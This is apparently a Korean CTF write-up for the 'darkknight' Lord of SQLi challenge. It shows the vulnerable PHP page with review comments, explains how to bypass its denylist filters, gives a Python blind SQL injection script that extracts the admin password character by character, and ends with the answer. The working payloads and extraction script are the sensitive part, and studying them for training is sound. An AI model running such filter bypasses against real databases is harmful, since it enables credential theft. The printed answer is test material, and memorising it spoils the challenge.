<?php
// Challenge page: two SQL queries built by string interpolation from $_GET.
// The comments below describe what the code does and why the denylist
// filters do not make the interpolation safe; the defensive fix is a
// prepared statement (pw bound as a string, no bound as an integer), not a
// longer denylist.
include "./config.php";
login_chk();
$db = dbconnect();
// NOTE(review): bare array keys ($_GET[no], $_GET[pw]) rely on the
// undefined-constant-to-string fallback; PHP 8 raises an Error for this.
// Denylist on `no`: "prob" (case-insensitive), "_", ".", "()" are rejected.
if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~")// filters prob (both cases), _, ., ()
// Single quote is rejected in `pw`.
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); // filters ' in pw
// Single quote, substr, ascii and "=" are rejected in `no`.
// NOTE(review): this is a token denylist, not an input type check. SQL
// offers equivalent spellings the list does not name (a different string
// delimiter, LIKE in place of =, other substring functions), so the
// interpolation below stays reachable; the write-up on this page uses
// exactly that.
if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe"); // filters ', substr, ascii in no
// Both GET values are placed directly in the SQL text. `no` has no quotes
// around it at all, so it is evaluated as an expression supplied by the client.
$query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
// The final query text is echoed back, so the client can see exactly how its
// input was interpolated.
echo "<hr>query : <strong>{$query}</strong><hr><br>";
// `@` hides mysqli warnings: a malformed query silently yields no row. The
// only visible difference between true/false conditions is whether the
// "Hello ..." heading below appears, i.e. a boolean oracle.
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
// Second query: here `pw` is escaped with addslashes() (the first query was
// not), and the stored admin pw is compared with the submitted value.
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
// NOTE(review): `==` is a loose comparison; hash_equals() (or at least ===)
// is the defensive form for comparing a secret.
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight");
// Shows this file's own source to the player.
highlight_file(__FILE__);
?>
= 대신 like, ' 대신 ", substr 대신 mid 함수를 사용해서 우회했다.
import requests
# Target of the write-up and the session cookie the challenge site expects.
url = 'https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php'
cookie = {'PHPSESSID': '자신의 세션 id'}
# Uppercase hex alphabet, matching what MySQL's hex() emits.
HEX = ''.join('%X' % digit for digit in range(16))
#16
def find_pw_len() -> int:
    """Return the length of hex(pw) for the admin row, found by linear probing.

    Each request asks the page whether ``length(hex(pw)) like N`` holds; the
    challenge prints "Hello admin" only when the injected condition is true,
    so the response body is the yes/no oracle. LIKE and double quotes are used
    because the page's filter rejects ``=`` and ``'`` in the ``no`` parameter.

    From a defender's view the signature is a run of requests from one
    session whose ``no`` parameter differs only by an incrementing number.
    """
    pw_len=1
    while True:
        # `no=123 or ...` keeps the statement valid without any quoting of `no`.
        r=requests.get(url+'?no=123 or id like "admin" and length(hex(pw)) like {}'.format(pw_len),cookies=cookie)
        if 'Hello admin' in r.text:
            return pw_len
        else:
            # NOTE(review): no upper bound — if the oracle never answers true
            # (expired session, changed page), this loop does not terminate.
            pw_len+=1
#0b70ea1f
def find_pw() -> None:
    """Print the admin pw by recovering hex(pw) one hex digit at a time.

    For each 1-based position ``i`` every digit in ``HEX`` is tried with
    ``mid(hex(pw), i, 1) like "<digit>"``; mid() stands in for substr(),
    which the filter rejects. Two recovered digits form one byte, which is
    decoded and printed immediately. Output goes to stdout; nothing is returned.
    """
    pw_len=find_pw_len()
    tmp=''
    for i in range(1,pw_len+1):
        for j in HEX:
            r=requests.get(url+'?no=123 or id like "admin" and mid(hex(pw),{},1) like "{}"'.format(i,j),cookies=cookie)
            if 'Hello admin' in r.text:
                tmp+=j
                # Every second digit completes a byte; decode and print it.
                if len(tmp)==2:
                    print(chr(int(tmp,16)),end="")
                    tmp=''
                # First matching digit wins; no further digits are tried for this position.
                break
find_pw()  # entry point: performs live requests against `url` using `cookie`
답: ?pw=0b70ea1f